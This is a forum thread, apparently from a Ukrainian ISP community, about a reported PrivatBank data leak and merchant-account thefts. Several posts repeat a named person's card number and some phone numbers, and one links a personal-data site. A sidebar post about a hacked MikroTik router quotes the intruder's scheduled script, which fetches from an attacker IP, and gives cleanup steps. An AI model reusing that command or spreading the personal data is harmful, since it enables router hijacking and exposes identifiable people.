Перейти до

В сентябре были взломаны серверы одного из украинских банков - СМИ


Рекомендованные сообщения

Утечка данных якобы произошла 12 сентября.  Иллюстрация REUTERS Сервера ПриватБанка взломаны, а личные данные клиентов — ушли в Россию, сообщает sprotyv.info со ссылкой на «Vse.Media». В распоряжение сайта попали скрин-шоты внутренней переписки сотрудников департамента ИТ-безопасности ПриватБанка. В своем чате они обсуждают взлом серверов банка и выкачку оттуда данных о клиентах на внешние сервера. Утечка данных произошла 12 сентября. Первые данные о ней сотрудиники ИТ-безопаности фиксируют в 8:42, и почти полтора часа не могут принять решение о прерывании копирования информации, так как на связи нет руководства. В 10:09 один из сотрудников ПриватБанка пишет коллегам, что в скачиваемом файле видны даты рождения, номера телефонов и «еще куча непонятной информации». Тогда же ИТ-шники фиксируют, что данные уходят на сервера, зарегистрированные в России. Их руководитель появляется на связи только к 10:29 по киевскому времени — и только тогда дает указание «обрубить копирование», но к этому моменту все файлы уже скопированы и выведены из банка. 

Подробности читайте на УНИАН: https://economics.unian.net/finance/2267726-v-sentyabre-byili-vzlomanyi-serveryi-odnogo-iz-ukrainskih-bankov-smi.html

 

 

 

 

1511879930-3183.jpg

 

1511879933-1553.jpg

 

1511879937-4334.jpg

 

1511879940-5321.jpg

 

 

 

Відредаговано zaborovsky
Ссылка на сообщение
Поделиться на других сайтах

Меня уже ломанули - сперва пытались вывести средства на украинскую карту Сбербанка росии, но после отказа вывели на 3 мобильных номера Киевстар.

Номер карты злоумышленника: 4524 0121 0785 4154 ANDRII MAKARENKO

Взлом происходил через мерчанта (приём платежей через Приват24)

Приват деньги так и не вернул.

post-12742-0-10886200-1511974461_thumb.jpgpost-12742-0-77215700-1511974468_thumb.pngpost-12742-0-33520900-1511974474_thumb.jpgpost-12742-0-48894800-1511974477_thumb.jpg

 

Ссылка на сообщение
Поделиться на других сайтах

Я сразу подумал, что взломали мой биллинг и поменял все пароли к юзерам и бд. Но из разговора со службой безопасности приватбанка узнал, что IP адрес, с которого проводились транзакции был не моей машины, а начинался на 10.1.x.x - тоесть внутренняя впн сеть привата. Более того - он принадлежал одному из их терминалов.

Номера телефонов +380983674874 +380983675273 +380681487092 они отследить не могли, так как никогда не использовались ни в приват24, ни в liqpay.

Злоумышленник знал остаток на моей карте, так как сумма подбиралась с учётом комиссий и в итоге на карте осталось 8 грн. Благо я там не храню большие суммы.

Відредаговано shad-krog
Ссылка на сообщение
Поделиться на других сайтах

Я сразу подумал, что взломали мой биллинг и поменял все пароли к юзерам и бд. Но из разговора со службой безопасности приватбанка узнал, что IP адрес, с которого проводились транзакции был не моей машины, а начинался на 10.1.x.x - тоесть внутренняя впн сеть привата. Более того - он принадлежал одному из их терминалов.

Номера телефонов +380983674874 +380983675273 +380681487092 они отследить не могли, так как никогда не использовались ни в приват24, ни в liqpay.

Злоумышленник знал остаток на моей карте, так как сумма подбиралась с учётом комиссий и в итоге на карте осталось 8 грн. Благо я там не храню большие суммы.

В итоге виноватым сделали Вас?
Ссылка на сообщение
Поделиться на других сайтах

 

Я сразу подумал, что взломали мой биллинг и поменял все пароли к юзерам и бд. Но из разговора со службой безопасности приватбанка узнал, что IP адрес, с которого проводились транзакции был не моей машины, а начинался на 10.1.x.x - тоесть внутренняя впн сеть привата. Более того - он принадлежал одному из их терминалов.

Номера телефонов +380983674874 +380983675273 +380681487092 они отследить не могли, так как никогда не использовались ни в приват24, ни в liqpay.

Злоумышленник знал остаток на моей карте, так как сумма подбиралась с учётом комиссий и в итоге на карте осталось 8 грн. Благо я там не храню большие суммы.

В итоге виноватым сделали Вас?

 

Пока, что периодически созваниваемся с их служьой безопасности, но средства ещё не вернули. Да я и не надеюсь - просто сделал выводы, что никакими кред. лимитами и депозитами пользоваться не буду. Только фиат и крипта.

Ссылка на сообщение
Поделиться на других сайтах

Ещё хочу дать совет тем, кто принимает платежи за услуги связи через Приват24

В разделе Все услуги>Бизнес>Мерчант в своём мерчанте уберите чекбоксы, которые не относятся к зачислению средств на карту привата - как на каритнке ниже.

post-12742-0-87283600-1511978117_thumb.jpg

Судя из нашего последнего разговора, случаи взлома таким способом стали увеличиваться.

Відредаговано shad-krog
Ссылка на сообщение
Поделиться на других сайтах

Ребятки та же фигня, подоили Клубнику на суму 13 К грн.

Приват розводит руками, говорит что я "дебил" сам виноват... Нефиг было юзать мерчант.

Что делать ??? =(((((((((((((((

Ссылка на сообщение
Поделиться на других сайтах

Меня уже ломанули - сперва пытались вывести средства на украинскую карту Сбербанка росии, но после отказа вывели на 3 мобильных номера Киевстар.

Номер карты злоумышленника: 4524 0121 0785 4154 ANDRII MAKARENKO

Взлом происходил через мерчанта (приём платежей через Приват24)

Приват деньги так и не вернул.

IMG_0331.JPG IMG_0354.PNG IMG_0330.JPG IMG_0318.jpg

Если вдруг надумаете судиться или еще както бороться, я присойденюся, я только ЗА...

Ссылка на сообщение
Поделиться на других сайтах

посреди операционного дня проходят апдетейты безопасности...

post-4677-0-75754900-1512054112_thumb.png

Відредаговано Apelsin
Ссылка на сообщение
Поделиться на других сайтах

Тут пару месяцев назад была тема о блокирование одноклассников, вконтакте, yandex и прочее. И особо упоратые рассказывали про кибербезопасность страны и так далее. Вот хочу спросить так где эта кибербезопасность? Персональные данные порядка 40 процентов население Украины были украдены. Что больше нанесло вред стране кража персональных данных или же  соц.сети)

Відредаговано gudwin888
Ссылка на сообщение
Поделиться на других сайтах

В Привате знакомые ничего не знают про данный случай. Уверены что утчека была? В переписке только догадки, а чем закончилось? Давно же было дело, или просто забили?

 

Ситуации выше возможны без всяких утечек.

Ссылка на сообщение
Поделиться на других сайтах

Тут пару месяцев назад была тема о блокирование одноклассников, вконтакте, yandex и прочее. И особо упоратые рассказывали про кибербезопасность страны и так далее. Вот хочу спросить так где эта кибербезопасность? Персональные данные порядка 40 процентов население Украины были украдены. Что больше нанесло вред стране кража персональных данных или же  соц.сети)

вот это ты ватный олень. Че там с кибербезопастностью страны асашай, где у yahoo спиздили 1 миллиард аккаунтов и взломали сервера демпартии ?

           Персональные данные  :lol:  ты вообще адекватный ? да N- десятков миллионов д#лб#$б@в из Украины сами их выложили в фсб-шые соцсети: фио, место работы, службы, учебы, отдыха, номера телефонов; переписывались там со своими любовницами/ пи#%рками, зафрендили всех своих знакомых, выложили в паблик свои фотки в разных местах от дома до работы, а не в паблик личные - фотки с фактами криминала или порицаемые социальной моралью, которые могут сильно насолить при публичном разглашении; гео-айпи постоянно чекало и писало откуда пациент зашел, а потом еще добавился gps и геотеги к фоткам. Все они собрали полнейшее досье на себя со всех ракурсов о котором гебня 20 лет назад и мечтать не могла, раньше на такое требовались месяцы и сотни человеко-часов, чтобы его собрать, а  эти кретины выложили сами и постоянно его сами дополняют.

    Не забываем "прекрасный сайт" на котором лет эдак 9 лежали все персональные данные с пропиской http://nomer-org.club/allukraina/ , раньше дизайн и домен, зареганный в московии, были чутка другие, но суть осталась та же.   

 

     На юконтрол и тд можно надыбать тоже кучу всего интересного, ну если вы не работаете тупо охранником и у вас ничего нет. Персональные данные, оло-ло-ло, в 21 веке :facepalm:     

     По теме топика, абсолютно нет ничего удивительного, что могли хакнуть и стащить данные, на античате еще лет 7-8 назад был тред и видосы, как хакали приват 24 и ничего, все живы.  Просто надо стараться хранить денег на счету как можно меньше, кэш наше все.      

Ссылка на сообщение
Поделиться на других сайтах

Меня уже ломанули - сперва пытались вывести средства на украинскую карту Сбербанка росии, но после отказа вывели на 3 мобильных номера Киевстар.

Номер карты злоумышленника: 4524 0121 0785 4154 ANDRII MAKARENKO

Взлом происходил через мерчанта (приём платежей через Приват24)

Приват деньги так и не вернул.

attachicon.gifIMG_0331.JPGattachicon.gifIMG_0354.PNGattachicon.gifIMG_0330.JPGattachicon.gifIMG_0318.jpg

А лимит оплаты в интернете у Вас установлен на карте?

Ссылка на сообщение
Поделиться на других сайтах

 

Тут пару месяцев назад была тема о блокирование одноклассников, вконтакте, yandex и прочее. И особо упоратые рассказывали про кибербезопасность страны и так далее. Вот хочу спросить так где эта кибербезопасность? Персональные данные порядка 40 процентов население Украины были украдены. Что больше нанесло вред стране кража персональных данных или же  соц.сети)

вот это ты ватный олень. Че там с кибербезопастностью страны асашай, где у yahoo спиздили 1 миллиард аккаунтов и взломали сервера демпартии ?

           Персональные данные  :lol:  ты вообще адекватный ? да N- десятков миллионов д#лб#$б@в из Украины сами их выложили в фсб-шые соцсети: фио, место работы, службы, учебы, отдыха, номера телефонов; переписывались там со своими любовницами/ пи#%рками, зафрендили всех своих знакомых, выложили в паблик свои фотки в разных местах от дома до работы, а не в паблик личные - фотки с фактами криминала или порицаемые социальной моралью, которые могут сильно насолить при публичном разглашении; гео-айпи постоянно чекало и писало откуда пациент зашел, а потом еще добавился gps и геотеги к фоткам. Все они собрали полнейшее досье на себя со всех ракурсов о котором гебня 20 лет назад и мечтать не могла, раньше на такое требовались месяцы и сотни человеко-часов, чтобы его собрать, а  эти кретины выложили сами и постоянно его сами дополняют.

    Не забываем "прекрасный сайт" на котором лет эдак 9 лежали все персональные данные с пропиской http://nomer-org.club/allukraina/ , раньше дизайн и домен, зареганный в московии, были чутка другие, но суть осталась та же.   

 

     На юконтрол и тд можно надыбать тоже кучу всего интересного, ну если вы не работаете тупо охранником и у вас ничего нет. Персональные данные, оло-ло-ло, в 21 веке :facepalm:     

     По теме топика, абсолютно нет ничего удивительного, что могли хакнуть и стащить данные, на античате еще лет 7-8 назад был тред и видосы, как хакали приват 24 и ничего, все живы.  Просто надо стараться хранить денег на счету как можно меньше, кэш наше все.      

 

Да уж как говорится 2 проблемы дураки и дороги) Конечно одеть вышиванку и орать "Героя слава" это настоящий патриот)

Ссылка на сообщение
Поделиться на других сайтах

 

Меня уже ломанули - сперва пытались вывести средства на украинскую карту Сбербанка росии, но после отказа вывели на 3 мобильных номера Киевстар.

Номер карты злоумышленника: 4524 0121 0785 4154 ANDRII MAKARENKO

Взлом происходил через мерчанта (приём платежей через Приват24)

Приват деньги так и не вернул.

attachicon.gifIMG_0331.JPGattachicon.gifIMG_0354.PNGattachicon.gifIMG_0330.JPGattachicon.gifIMG_0318.jpg

А лимит оплаты в интернете у Вас установлен на карте?

Был лимит 100 грн/день, так ета падла какимто образом установила лимит оплаты 100500 грн.

Приватовская "служба безопасности" говорит будеш бошлять что мы сами выноваты, хотя дырка у них!

Подскажыте как бороться... как капустил вернуть!

Ссылка на сообщение
Поделиться на других сайтах

 

 

Меня уже ломанули - сперва пытались вывести средства на украинскую карту Сбербанка росии, но после отказа вывели на 3 мобильных номера Киевстар.

Номер карты злоумышленника: 4524 0121 0785 4154 ANDRII MAKARENKO

Взлом происходил через мерчанта (приём платежей через Приват24)

Приват деньги так и не вернул.

attachicon.gifIMG_0331.JPGattachicon.gifIMG_0354.PNGattachicon.gifIMG_0330.JPGattachicon.gifIMG_0318.jpg

А лимит оплаты в интернете у Вас установлен на карте?

Был лимит 100 грн/день, так ета падла какимто образом установила лимит оплаты 100500 грн.

Приватовская "служба безопасности" говорит будеш бошлять что мы сами выноваты, хотя дырка у них!

Подскажыте как бороться... как капустил вернуть!

 

Ну вам прямая дорога в суд, только адвокат нужен хороший

Ссылка на сообщение
Поделиться на других сайтах

 

Меня уже ломанули - сперва пытались вывести средства на украинскую карту Сбербанка росии, но после отказа вывели на 3 мобильных номера Киевстар.

Номер карты злоумышленника: 4524 0121 0785 4154 ANDRII MAKARENKO

Взлом происходил через мерчанта (приём платежей через Приват24)

Приват деньги так и не вернул.

attachicon.gifIMG_0331.JPGattachicon.gifIMG_0354.PNGattachicon.gifIMG_0330.JPGattachicon.gifIMG_0318.jpg

А лимит оплаты в интернете у Вас установлен на карте?

 

Был лимит - поэтому и вывели на мобильные номера

Ссылка на сообщение
Поделиться на других сайтах

Привату переход в государственное владение на пользу не пошел. Если проще - охерели.

Вчера делал платеж в терминале наличкой на карту, стандартно, ввел реквизиты, оплата наличкой. Сумма некруглая + комиссия, пихаю как всегда чуть больше.

Доходит дело до сдачи и тут - тадаам! Возврат сдачи с комиссией. На мою же кредитку, которой я авторизировался, 30грн сдачи вернутся с комиссией 2грн(6.5% получается). Хотя на этом же терминале в описании комиссия только на КДВ, 0.5%.

И тут же предлагают эти деньги потратить без комиссии на пополнение мобилки. Дело принципа, выбираю пополнение, оно показывает комиссия 0, набираю номер, пока проверю правильность(проходит секунд 30) - поле комиссии обновляется - 3грн. Или 10%.

Перебираю все карты - хер там, в итоге комиссию за сдачу успешно содрали, вдобавок к комиссии самого платежа.

 

В тот же день звонок из центрального офиса. Вы инициировали возврат платежа, назовите все свои данные для продолжения. Я в ответ - вашими же правилами запрещено по телефону это называть, зачем оно вам? Да и не отменял я ничего. В ответ лепет что так нужно, они не в курсе, перезвонят позже. Кое-как упросил не ложить трубку и объяснить что же я там отменял - оказалось БЕЗНАЛИЧНУЮ заявку по ФОП висящую 2 месяца обработали, аж на 100рн которая. И для этого звонят на личный телефон и требуют ИНН, фамилию матери и т.п. И звонит понятное дело не персональный менеджер с которым работали 10 лет, а девочка из колл-центра. Походу нет больше менеджеров.

Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Вхід

Уже зарегистрированы? Войдите здесь.

Войти сейчас
  • Зараз на сторінці   0 користувачів

    Немає користувачів, що переглядають цю сторінку.

  • Схожий контент

    • Від KGroup
      Доброго времени суток коллеги.
      Такая проблема случилось...
      Взломали сеть - положили биллинг и микротик основной. 
      Также сдохло железо (программно) все что касается оборудования микротик и юбикюти. 
      Восстанавливаем уже третьи сутки.
       
      Вопрос:
      Как дальше обезопасить сеть? Какое железо и ПО преобрести чтобы упредить данные неприятные инсинуации.
      Офтоп... просьба не поддергивать и не писать нелепые сообщения, попросту помочь советом.
      Заранее спасибо.
    • Від userok
      Без лишних подробностей. ссыль
      Очередной раз через уязвимость winbox на одной из последних прошивках 6.41.3 якобы безопасных был взломан микротик на раз-два!
      Суть проблемы — вход злоумышленника через winbox с ip 95.154.216.160 абсолютно без проблем, в моём случае 2 неудачных попытки входа и 3-й успешный вход под второй учёткой со сложным паролем нигде не засвеченным.
      Под этим логином не входили никогда, создана учётка про запас на случай потери основного пароля.
       
      Далее после входа злоумышленник на микротике:
      1. Создаёт скрипт script1_ 
      /tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http

      2. Создаёт в планировщике задание каждые 30 секунд выполнять скрипт script1_
      3. Включает IP-> Socks
      /ip socks> print enabled: yes port: 4145 connection-idle-timeout: 2m max-connections: 200

      Самое интересное то, что файл mikrotik.php пустой, либо это значит что это только предупреждение об уязвимости, либо всётаки конфиг ушёл в английское королевство.

      Пока непонятно как такое могло быть?!
      Что делать ели Ваш микротик взломан таким образом?
      Надо изначально было не давать доступ к winbox из внешней сети, разрешить только с определённых айпи.
      Удалить скрипт и задание планировщика.
      Выключить носки) Ip->Socks
      Менять пароли
      Шиться новой прошивкой, но не факт что она уже есть с фиксом)
    • Від SDE
      Нус, коллеги признавайтесь, кого сегодня грохнуло?
      Позиция убнт  на форуме особо порадовала)
       
    • Від Dilan
      Всем привет, ситуация смешная, но не очень. Посмотрел в логах своего микротика, и что обнаружил. Кто-то хочет его взломать, Сначала по вебморде, сейчас по телнету. Что с ним сделать?

×
×
  • Створити нове...